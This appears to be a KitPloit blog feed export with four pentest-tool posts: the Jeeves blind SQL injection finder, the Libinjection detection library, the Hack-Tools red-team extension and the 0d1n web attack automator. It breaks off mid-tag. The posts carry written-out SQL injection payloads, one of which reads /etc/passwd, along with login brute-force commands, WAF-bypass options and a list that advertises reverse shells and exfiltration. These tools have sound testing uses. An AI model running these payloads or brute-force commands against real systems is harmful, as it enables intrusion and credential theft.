tag:blogger.com,1999:blog-83172222311336605472024-03-19T08:30:32.443-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger68125tag:blogger.com,1999:blog-8317222231133660547.post-39277488328870507342022-06-10T17:30:00.004-04:002022-06-10T17:30:00.258-04:00Jeeves - Time-Based Blind SQLInjection Finder<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjwZ8dEQeF3stp-XvrZJ8rzWOoJ7mPB5N-FQFgsVhPdIC4EF5dpCLHNu3i2Cwo3lhI57zv8vanLAjhpmm06YjZspcRj4mZ9kUcw-6FiUfPKssIOyZigTwb_K_HtESqNyKyoZO_aFiVU_EGr9Q0WlY9yRRLwBGyGOMZi8ZHHJ0xawHTF8wRpkSbFCIyz"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7105526880069218162" src="https://blogger.googleusercontent.com/img/a/AVvXsEjwZ8dEQeF3stp-XvrZJ8rzWOoJ7mPB5N-FQFgsVhPdIC4EF5dpCLHNu3i2Cwo3lhI57zv8vanLAjhpmm06YjZspcRj4mZ9kUcw-6FiUfPKssIOyZigTwb_K_HtESqNyKyoZO_aFiVU_EGr9Q0WlY9yRRLwBGyGOMZi8ZHHJ0xawHTF8wRpkSbFCIyz=s320" /></a></p><p><br /></p> <h3 align="center" dir="auto">Jeeves is made for looking to Time-Based Blind SQLInjection through recon.</h3><span><a name='more'></a></span><div><br /></div> <h2 dir="auto">- Installation & Requirements:</h2> <p dir="auto">Installing Jeeves </p><div></div> <div><pre><code>$ go install github.com/ferreiraklet/Jeeves@latest</code></pre></div> <p dir="auto">OR</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ git clone https://github.com/ferreiraklet/Jeeves.git $ cd Jeeves $ go build jeeves.go $ chmod +x jeeves $ ./jeeves -h"><pre><code>$ git clone https://github.com/ferreiraklet/Jeeves.git<br />$ cd Jeeves<br />$ go build jeeves.go<br />$ chmod +x jeeves<br />$ ./jeeves -h</code></pre></div> <br /> <h2 dir="auto">- Usage & Explanation:</h2> <p dir="auto">In Your recon process, you may find <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" title="endpoints">endpoints</a> that can be <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to sql injection, Ex: <a href="https://redacted.com/index.php?id=1" rel="nofollow" target="_blank" title="https://redacted.com/index.php?id=1">https://redacted.com/index.php?id=1</a></p> <h3 dir="auto">Single urls</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10"><pre><code>echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time<br />echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5<br />echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10</code></pre></div> <p dir="auto">In --payload-time you must use the time mentioned in payload</p> <br /> <h3 dir="auto">From list</h3> <p dir="auto"><code>cat targets | jeeves --payload-time 5</code></p> <h3 dir="auto">Adding Headers</h3> <p dir="auto">Pay attention to the syntax! Must be the same =></p> <div><pre><code>echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"</code></pre></div> <h3 dir="auto">Using proxy</h3> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port" echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port""><pre><code>echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"<br />echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"</code></pre></div> <br /> <p dir="auto">Proxy + <a href="https://www.kitploit.com/search/label/Headers" target="_blank" title="Headers">Headers</a> =></p> <div><pre><code>echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"</code></pre></div> <h3 dir="auto">Post Request</h3> <p dir="auto">Sending data through post request ( <a href="https://www.kitploit.com/search/label/Login" target="_blank" title="login">login</a> forms, etc )</p> <p dir="auto">Pay attention to the syntax! Must be equal! -></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx" echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port""><pre><code>echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"<br />echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"</code></pre></div> <h2 dir="auto">Another ways of Usage</h2> <p dir="auto">You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght</p> <br /> <p dir="auto"><strong>Command line flags</strong>:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" Usage: -t, --payload-time, The time from payload -p, --proxy Send <a title=" href="https://www.kitploit.com/search/label/Traffic" traffic="">traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message"><pre><code> Usage:<br /> -t, --payload-time, The time from payload<br /> -p, --proxy Send traffic to a proxy<br /> -c Set Concurrency, Default 25<br /> -H, --headers Custom Headers<br /> -d, --data Sending Post request with data<br /> -h Show This Help Message</code></pre></div> <br /> <p dir="auto">Using with sql payloads wordlist</p> <div><pre><code>cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done</code></pre></div> <p dir="auto">Testing in headers</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10 echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10 Payload credit: https://github.com/rohit0x5"><pre><code>echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10<br />echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10<br /><br />Payload credit: https://github.com/rohit0x5</code></pre></div> <p dir="auto">OBS:</p> <ul dir="auto"> <li>Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"</li> <li>Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )</li> </ul> <br /> <h2 dir="auto">This project is for educational and bug bounty porposes only! I do not support any illegal activities!.</h2> <p dir="auto">If any error in the program, talk to me immediatly.</p> <h2 dir="auto">Please, also check these => <br /></h2> <blockquote> <p dir="auto"><a href="https://github.com/ferreiraklet/nilo" rel="nofollow" target="_blank" title="Nilo">Nilo</a> - Checks if URL has status 200</p> </blockquote> <blockquote> <p dir="auto"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank" title="SQLMAP">SQLMAP</a></p> </blockquote> <blockquote> <p dir="auto"><a href="https://github.com/JohnTroony/Blisqy" rel="nofollow" target="_blank" title="Blisqy">Blisqy</a> Header time based SQLI</p> </blockquote> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ferreiraklet/Jeeves" rel="nofollow" target="_blank" title="Download Jeeves">Download Jeeves</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71984486434930539092021-06-10T08:30:00.006-04:002021-06-10T08:30:00.317-04:00Libinjection - SQL / SQLI Tokenizer Parser Analyzer<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-W4TuZEsw8qs/YL1rYAxHFlI/AAAAAAAAZ8s/Qjo4jvaQaaM7K5iBhMxYB9JpNgMVka0rQCNcBGAsYHQ/s1003/sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="1003" height="272" src="https://1.bp.blogspot.com/-W4TuZEsw8qs/YL1rYAxHFlI/AAAAAAAAZ8s/Qjo4jvaQaaM7K5iBhMxYB9JpNgMVka0rQCNcBGAsYHQ/w640-h272/sqli.png" width="640" /></a></div><p><br /></p> <p>SQL / SQLI tokenizer parser analyzer. For</p> <ul> <li>C and C++</li> <li><a href="https://libinjection.client9.com/doc-sqli-php" rel="nofollow" target="_blank" title="PHP">PHP</a></li> <li><a href="https://libinjection.client9.com/doc-sqli-python" rel="nofollow" target="_blank" title="Python">Python</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/lua" rel="nofollow" target="_blank" title="Lua">Lua</a></li> <li><a href="https://github.com/jeonglee/Libinjection" rel="nofollow" target="_blank" title="Java">Java</a> (external port)</li> <li>[LuaJIT/FFI] (<a href="https://github.com/p0pr0ck5/lua-ffi-libinjection" rel="nofollow" target="_blank" title="https://github.com/p0pr0ck5/lua-ffi-libinjection">https://github.com/p0pr0ck5/lua-ffi-libinjection</a>) (external port)</li> </ul> <p>See <a href="https://www.client9.com/" rel="nofollow" target="_blank" title="https://www.client9.com/">https://www.client9.com/</a> for details and presentations.</p><span><a name='more'></a></span><p><br /></p> <p>Simple example:</p> <div class="highlight highlight-source-c position-relative" data-snippet-clipboard-copy-content="#include <stdio.h> #include <strings.h> #include <errno.h> #include "libinjection.h" #include "libinjection_sqli.h" int main(int argc, const char* argv[]) { struct libinjection_sqli_state state; int issqli; const char* input = argv[1]; size_t slen = strlen(input); /* in real-world, you would url-decode the input, etc */ libinjection_sqli_init(&state, input, slen, FLAG_NONE); issqli = libinjection_is_sqli(&state); if (issqli) { fprintf(stderr, "sqli detected with <a title=" fingerprint="" href="https://www.kitploit.com/search/label/Fingerprint">fingerprint of '%s'\n", state.fingerprint); } return issqli; } "><pre><code>#include <stdio.h><br />#include <strings.h><br />#include <errno.h><br />#include "libinjection.h"<br />#include "libinjection_sqli.h"<br /><br />int main(int argc, const char* argv[])<br />{<br /> struct libinjection_sqli_state state;<br /> int issqli;<br /><br /> const char* input = argv[1];<br /> size_t slen = strlen(input);<br /><br /> /* in real-world, you would url-decode the input, etc */<br /><br /> libinjection_sqli_init(&state, input, slen, FLAG_NONE);<br /> issqli = libinjection_is_sqli(&state);<br /> if (issqli) {<br /> fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint);<br /> }<br /> return issqli;<br />}</code></pre></div> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="$ gcc -Wall -Wextra examples.c libinjection_sqli.c $ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--" sqli detected with fingerprint of 's&1UE' "><pre><code>$ gcc -Wall -Wextra examples.c libinjection_sqli.c<br />$ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--"<br />sqli detected with fingerprint of 's&1UE'<br /></code></pre></div> <p>More advanced samples:</p> <ul> <li><a href="https://github.com/client9/libinjection/blob/master/src/sqli_cli.c" rel="nofollow" target="_blank" title="sqli_cli.c">sqli_cli.c</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/reader.c" rel="nofollow" target="_blank" title="reader.c">reader.c</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/fptool.c" rel="nofollow" target="_blank" title="fptool">fptool</a></li> </ul> <br /><span style="font-size: large;"><b>VERSION INFORMATION</b></span><br /> <p>See <a href="https://github.com/client9/libinjection/blob/master/CHANGELOG" rel="nofollow" target="_blank" title="CHANGELOG">CHANGELOG</a> for details.</p> <p>Versions are listed as "major.minor.point"</p> <p>Major are significant changes to the API and/or fingerprint format. Applications will need recompiling and/or refactoring.</p> <p>Minor are C code changes. These may include</p> <ul> <li>logical change to detect or suppress</li> <li>optimization changes</li> <li>code refactoring</li> </ul> <p>Point releases are purely data changes. These may be safely applied.</p> <br /><span style="font-size: large;"><b>QUALITY AND DIAGNOSITICS</b></span><br /> <p>The <a href="https://www.kitploit.com/search/label/Continuous%20Integration" target="_blank" title="continuous integration">continuous integration</a> results at <a href="https://travis-ci.org/client9/libinjection" rel="nofollow" target="_blank" title="https://travis-ci.org/client9/libinjection">https://travis-ci.org/client9/libinjection</a> tests the following:</p> <ul class="contains-task-list"> <li class="task-list-item">build and unit-tests under GCC</li> <li class="task-list-item">build and unit-tests under Clang</li> <li class="task-list-item"><a href="https://www.kitploit.com/search/label/Static%20Analysis" target="_blank" title="static analysis">static analysis</a> using <a href="http://clang-analyzer.llvm.org" rel="nofollow" target="_blank" title="clang static analyzer">clang static analyzer</a></li> <li class="task-list-item">static <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> using <a href="https://github.com/danmar/cppcheck" rel="nofollow" target="_blank" title="cppcheck">cppcheck</a></li> <li class="task-list-item">checks for <a href="https://www.kitploit.com/search/label/Memory" target="_blank" title="memory">memory</a> errors using <a href="http://valgrind.org/" rel="nofollow" target="_blank" title="valgrind">valgrind</a></li> <li class="task-list-item">code coverage online using <a href="https://coveralls.io/github/client9/libinjection" rel="nofollow" target="_blank" title="coveralls.io">coveralls.io</a></li> </ul> <br /><span style="font-size: large;"><b>EMBEDDING</b></span><br /> <p>The <a href="https://github.com/client9/libinjection/tree/master/src" rel="nofollow" target="_blank" title="src">src</a> directory contains everything, but you only need to copy the following into your source tree:</p> <ul> <li><a href="https://github.com/client9/libinjection/blob/master/src/libinjection.h" rel="nofollow" target="_blank" title="src/libinjection.h">src/libinjection.h</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/libinjection_sqli.c" rel="nofollow" target="_blank" title="src/libinjection_sqli.c">src/libinjection_sqli.c</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/src/libinjection_sqli_data.h" rel="nofollow" target="_blank" title="src/libinjection_sqli_data.h">src/libinjection_sqli_data.h</a></li> <li><a href="https://github.com/client9/libinjection/blob/master/COPYING" rel="nofollow" target="_blank" title="COPYING">COPYING</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/client9/libinjection" rel="nofollow" target="_blank" title="Download Libinjection">Download Libinjection</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-27873165673281119812021-01-06T18:12:00.007-03:002021-01-06T18:12:41.044-03:00Hack-Tools v0.3.0 - The All-In-One Red Team Extension For Web Pentester<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-QMFKQ1ABihI/X_YnN1ZGVSI/AAAAAAAAU4A/zvB_1WlIv6MNoxSEYJ93mj2gMD4-HlBawCNcBGAsYHQ/s1280/Hack-Tools_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="731" data-original-width="1280" height="366" src="https://1.bp.blogspot.com/-QMFKQ1ABihI/X_YnN1ZGVSI/AAAAAAAAU4A/zvB_1WlIv6MNoxSEYJ93mj2gMD4-HlBawCNcBGAsYHQ/w640-h366/Hack-Tools_9.png" width="640" /></a></div><p><br /></p><b>The all-in-one <a href="https://www.kitploit.com/search/label/Red%20Team" target="_blank" title="Red Team">Red Team</a> browser extension for <strong>Web Pentesters</strong></b><br /> <p>HackTools, is a web extension facilitating your <strong>web application penetration tests</strong>, it includes <strong>cheat sheets</strong> as well as all the <strong>tools</strong> used during a test such as XSS payloads, Reverse shells and much more.</p> <p>With the extension you <strong>no longer need to search for payloads in different websites</strong> or in your local storage space, most of the tools are accessible in one click. HackTools is accessible either in <strong>pop up mode</strong> or in a whole tab in the <strong>Devtools</strong> part of the browser with F12.</p><span><a name='more'></a></span><div><br /></div><b>Current functions</b><br /> <ul> <li>Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat)</li> <li>Shell Spawning (TTY Shell Spawning)</li> <li>XSS Payloads</li> <li>Basic SQLi payloads</li> <li>Local file inclusion payloads (LFI)</li> <li>Base64 Encoder / Decoder</li> <li>Hash <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="Generator">Generator</a> (MD5, SHA1, SHA256, SHA512, SM3)</li> <li>Useful Linux commands (Port Forwarding, SUID)</li> <li>RSS Feed (Exploit DB, Cisco Security Advisories, CXSECURITY)</li> <li>CVE Search Engine</li> <li>Various method of data <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> and download from a remote machine</li> </ul> <br /><span style="font-size: large;"><b>Preview</b></span><br /> <div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Dx8e84ksU20/X_YnWg19MQI/AAAAAAAAU4I/aQlNFzriOiAY0mailVCY3m6iRnHTCm1SACNcBGAsYHQ/s1309/Hack-Tools_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-Dx8e84ksU20/X_YnWg19MQI/AAAAAAAAU4I/aQlNFzriOiAY0mailVCY3m6iRnHTCm1SACNcBGAsYHQ/w640-h390/Hack-Tools_10.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-X-Arj_BzAwQ/X_YnWtGLLOI/AAAAAAAAU4E/OjNoVvyxfGgEQQnIK-cXN9tS1HoFm5X7wCNcBGAsYHQ/s1309/Hack-Tools_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-X-Arj_BzAwQ/X_YnWtGLLOI/AAAAAAAAU4E/OjNoVvyxfGgEQQnIK-cXN9tS1HoFm5X7wCNcBGAsYHQ/w640-h390/Hack-Tools_11.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-3Gel9RO5i_c/X_YnWik7I9I/AAAAAAAAU4M/9soNCKAWXcsxErgQ9w45DY92hBqBP-VWwCNcBGAsYHQ/s1309/Hack-Tools_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-3Gel9RO5i_c/X_YnWik7I9I/AAAAAAAAU4M/9soNCKAWXcsxErgQ9w45DY92hBqBP-VWwCNcBGAsYHQ/w640-h390/Hack-Tools_12.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SxnQ20-yeMI/X_YnXLEjQLI/AAAAAAAAU4Q/uyJbCYO6VXMadbRtNTAfRjGooDauOE79gCNcBGAsYHQ/s1309/Hack-Tools_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="799" data-original-width="1309" height="390" src="https://1.bp.blogspot.com/-SxnQ20-yeMI/X_YnXLEjQLI/AAAAAAAAU4Q/uyJbCYO6VXMadbRtNTAfRjGooDauOE79gCNcBGAsYHQ/w640-h390/Hack-Tools_13.png" width="640" /></a></div><br /><div><br /></div> <br /><span style="font-size: x-large;"><b>Install the extension</b></span><br /> <br /><b>Chromium based browser</b><br /> <p>You can download the <strong>latest build</strong> <a href="https://github.com/LasCC/Hack-Tools/releases" rel="nofollow" target="_blank" title="here.">here.</a></p> <p>Or, you can download the extension on the <strong>chorme web store</strong> <a href="https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi" rel="nofollow" target="_blank" title="there.">there.</a></p> <p>Otherwise, if you want to build the project yourself from the source code</p> <br /><b>Mozilla Firefox</b><br /> <p>You can download <strong>HackTools</strong> on the Firefox browser <a href="https://www.kitploit.com/search/label/Add-ons" target="_blank" title="add-ons">add-ons</a> <a href="https://addons.mozilla.org/en-US/firefox/addon/hacktools/" rel="nofollow" target="_blank" title="here.">here.</a></p> <br /><b>Build from source code</b><br /> <div><pre><code>yarn install && yarn build</code></pre></div> <p>Once the build is done correctly, webpack will create a new folder called <strong>dist</strong></p> <p>After that you need to go to the <strong>extension</strong> tab on your chrome based navigator and turn on the <strong>developer mode</strong></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GtAkilc2MD0/X_YneUp03zI/AAAAAAAAU4Y/uX-Cm3vN4_keBO7angjtAl4wpnewqqD9ACNcBGAsYHQ/s287/Hack-Tools_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="130" data-original-width="287" height="290" src="https://1.bp.blogspot.com/-GtAkilc2MD0/X_YneUp03zI/AAAAAAAAU4Y/uX-Cm3vN4_keBO7angjtAl4wpnewqqD9ACNcBGAsYHQ/w640-h290/Hack-Tools_14.png" width="640" /></a></div><p><br /></p> <p>Then click on the <strong>load unpacked</strong> button in the top left corner</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-rUDN-3sy5cM/X_YniP2AAJI/AAAAAAAAU4c/4pp-3Fs5aishoiW-1uEpBz9aj1gLao5qwCNcBGAsYHQ/s563/Hack-Tools_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="125" data-original-width="563" height="142" src="https://1.bp.blogspot.com/-rUDN-3sy5cM/X_YniP2AAJI/AAAAAAAAU4c/4pp-3Fs5aishoiW-1uEpBz9aj1gLao5qwCNcBGAsYHQ/w640-h142/Hack-Tools_15.png" width="640" /></a></div><p><br /></p> <p>Once you clicked on the button you just need to select the <strong>dist folder</strong> and that's it ! </p><div></div> <div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-YFuYevct3N0/X_YnoDOrycI/AAAAAAAAU4o/y4gwew1clH8hXmQcnzURHSwDmx94-9cWwCNcBGAsYHQ/s802/Hack-Tools_16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="802" height="364" src="https://1.bp.blogspot.com/-YFuYevct3N0/X_YnoDOrycI/AAAAAAAAU4o/y4gwew1clH8hXmQcnzURHSwDmx94-9cWwCNcBGAsYHQ/w640-h364/Hack-Tools_16.png" width="640" /></a></div><p><br /></p><span style="font-size: large;"><b>Authors</b></span><br /> <p></p><div></div> <strong>Ludovic COULON & Riadh BOUCHAHOUA</strong> <br /><p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/LasCC/Hack-Tools" rel="nofollow" target="_blank" title="Download Hack-Tools">Download Hack-Tools</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71103475561679305622020-12-22T08:30:00.001-03:002020-12-22T08:30:08.070-03:000D1N v3.4 - Tool For Automating Customized Attacks Against Web Applications (Full Made In C Language With Pthreads, Have A Fast Performance)<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ehW_OJoFVtM/X-F9pZEWFZI/AAAAAAAAUtg/Y1ZE5FQcZYAiXJBKovOOrrLXyNLGj30YACNcBGAsYHQ/s972/0d1n_1_overview1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="972" height="406" src="https://1.bp.blogspot.com/-ehW_OJoFVtM/X-F9pZEWFZI/AAAAAAAAUtg/Y1ZE5FQcZYAiXJBKovOOrrLXyNLGj30YACNcBGAsYHQ/w640-h406/0d1n_1_overview1.png" width="640" /></a></div><p><br /></p> <p>0d1n is a tool for automating customized attacks against web applications. This tool is very faster because uses thread pool and C language.</p><span><a name='more'></a></span><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-7VgP3PRXfac/X-F9vgpsWMI/AAAAAAAAUto/102E38V61ekLhVtjwo2R7ipRlcGuB0b1gCNcBGAsYHQ/s951/0d1n_2_tables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="732" data-original-width="951" height="492" src="https://1.bp.blogspot.com/-7VgP3PRXfac/X-F9vgpsWMI/AAAAAAAAUto/102E38V61ekLhVtjwo2R7ipRlcGuB0b1gCNcBGAsYHQ/w640-h492/0d1n_2_tables.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-icpCqWjAZTI/X-F9vjAdFwI/AAAAAAAAUtk/fDHLBuFwzvUKcAWaci8C3179ILiHkSGWgCNcBGAsYHQ/s957/0d1n_3_datatables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="485" data-original-width="957" height="324" src="https://1.bp.blogspot.com/-icpCqWjAZTI/X-F9vjAdFwI/AAAAAAAAUtk/fDHLBuFwzvUKcAWaci8C3179ILiHkSGWgCNcBGAsYHQ/w640-h324/0d1n_3_datatables.png" width="640" /></a></div><p><br /></p><p>0d1n is a tool for automating customized attacks against web applications. Video demo:</p><p><br /></p><p style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/1L22mbbVge0" width="560"></iframe></p> <br /><span style="font-size: large;"><b>Tool functions:</b></span><br /> <ul> <li> <p>Brute force login and <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> in auth forms</p> </li> <li> <p>Directory disclosure ( use PATH list to brute, and find HTTP status code )</p> </li> <li> <p>Test to find SQL <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="Injection">Injection</a> and XSS vulnerabilities</p> </li> <li> <p>Test to find SSRF</p> </li> <li> <p>Test to find COmmand injection</p> </li> <li> <p>Options to load ANTI-CSRF token each request</p> </li> <li> <p>Options to use random proxy per request</p> </li> <li> <p>other functions...</p> </li> </ul> <br /><span style="font-size: large;"><b>To run and install follow this steps:</b></span><br /> <p>require libcurl-dev or libcurl-devel(on rpm linux based)</p> <p>$ git clone <a href="https://github.com/CoolerVoid/0d1n/" rel="nofollow" target="_blank" title="https://github.com/CoolerVoid/0d1n/">https://github.com/CoolerVoid/0d1n/</a></p> <p>You need libcurl to run, look the following to install::</p> <pre><code>$ sudo apt-get install libcurl-dev<br />or try libcurl4-dev... libcurl*<br /><br />if rpm distro<br /><br />$ sudo yum install libcurl-devel<br /></code></pre> <p>To install follow this cmd:</p> <pre><code>$ cd 0d1n<br /><br />$ make; sudo make install USER=name_your_user; <br /><br />$ cd 0d1n_view; make; sudo make install USER=name_your_user; <br /></code></pre> <p>Up the view server to look the reports online:</p> <pre><code>$ sudo 0d1n_view <br /><br /></code></pre> <p>Now in other <a href="https://www.kitploit.com/search/label/Console" target="_blank" title="console">console</a> you can run the tool:</p> <pre><code><br />$ 0d1n<br /><br /></code></pre> <br /><span style="font-size: large;"><b>to uninstall follow this steps:</b></span><br /> <pre><code>$ cd 0d1n; sudo make uninstall<br /><br />$ cd 0d1n_view; sudo make uninstall<br /><br /></code></pre> <br /><span style="font-size: large;"><b>Attack examples:</b></span><br /> <p>Brute force to find directory</p> <pre><code>$ 0d1n --host http://127.0.0.1/^ --payloads /opt/0d1n/payloads/dir_brute.txt --threads 500 --timeout 3 --log bartsimpsom4 --save_response<br /></code></pre> <p>Note: You can change value of threads, if you have a good machine, you can try 800, 1200... each machine have a different context.</p> <p>For SQL injection attack</p> <pre><code>$ 0d1n --host 'http://site.com/view/1^/product/^/' --payloads /opt/0d1n/payloads/sqli_list.txt --find_string_list /opt/0d1n/payloads/sqli_str2find_list.txt --log log1337 --tamper randcase --threads 800 --timeout 3 --save_response\n"<br /></code></pre> <p>Note: Tamper is resource to try bypass the web application firewall</p> <p>To <a href="https://www.kitploit.com/search/label/Brute%20Force" target="_blank" title="brute force">brute force</a> auth system</p> <pre><code>0d1n --host 'http://site.com/auth.py' --post 'user=admin&password=^' --payloads /opt/0d1n/payloads/wordlist.txt --log log007 --threads 500 --timeout 3\n"<br /></code></pre> <p>Note: if have csrf token, you can use argv to get this token each request and brute...</p> <p>Search SQLi in hard mode in login system with csrf token:</p> <pre><code>0d1n --host "http://127.0.0.1/vulnerabilities/sqli/index.php?id=^" --payloads /opt/0d1n/payloads/sqli.txt --find_string_list /opt/0d1n/payloads/find_responses.txt --token_name user_token --log logtest_fibonaci49 --cookie_jar /home/user_name/cookies.txt --save_response --tamper randcase --threads 100<br /></code></pre> <p>Note: Load cookies jar form browser and save in cookies.txt to load.</p> <br /><span style="font-size: large;"><b>Notes External libs</b></span><br /> <ul> <li> <p>To gain extreme <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> 0d1n uses thread pool of posix threads, you can study this small library: <a 